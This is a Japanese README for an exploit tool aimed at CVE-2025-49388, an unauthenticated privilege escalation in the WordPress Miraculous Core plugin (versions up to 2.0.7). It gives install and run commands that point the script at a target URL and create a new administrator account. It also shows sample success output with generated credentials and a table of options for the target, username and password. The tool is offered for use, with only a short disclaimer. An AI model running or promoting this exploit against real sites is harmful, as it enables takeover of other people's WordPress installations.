
Miraculous Core (kamleshyadav) ≤ 2.0.7 — 未認証の権限昇格
WordPress Miraculous Core Plugin プラグイン <= 2.0.7 は権限昇格に対して脆弱です
誤った特権割り当ての脆弱性が、kamleshyadav の Miraculous Core Plugin に存在し、認証されていない攻撃者が特権を昇格させて管理者アカウントを登録することを可能にします。
影響を受けるバージョン: n/a から 2.0.7
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (評価はまだ提供されていません)
このPythonスクリプトは、Miraculous Core プラグインがインストールされた脆弱性のあるWordPressインスタンスに新しい管理者アカウントを登録することで、CVE-2025-49388 の悪用を自動化します。
高信頼性を提供し、繰り返しの信頼性の高い悪用のためにデータをランダム化し、ヘッダー、Cookie、バイパス試行を自動的に処理します。
依存関係のインストール:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPTIONS]
例:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
注記:
ユーザー名またはメールアドレスを省略した場合、重複エラーを避けるため、各実行ごとにランダムな値が生成されます。
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
このツールは、教育および正規のセキュリティテスト目的のみで提供されます。
明示的な許可なくシステムを不正に悪用することは違法かつ非倫理的です。
作者は誤用や損害について一切の責任を負いません。責任を持って使用してください。
| Option | Description | Example |
|---|
-u, --url | 対象のWordPress URL (必須) | -u http://target.com/wordpress |
-un, --username | 希望するユーザー名 (デフォルト: ランダム) | -un admin1337 |
-fn, --full_name | フルネーム (デフォルト: Nxploited) | -fn "John Doe" |
-em, --useremail | メールアドレス (デフォルト: ランダム) | -em [email protected] |
-pw, --password | パスワード (デフォルト: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | 結果をファイルに記録 | -o result.txt |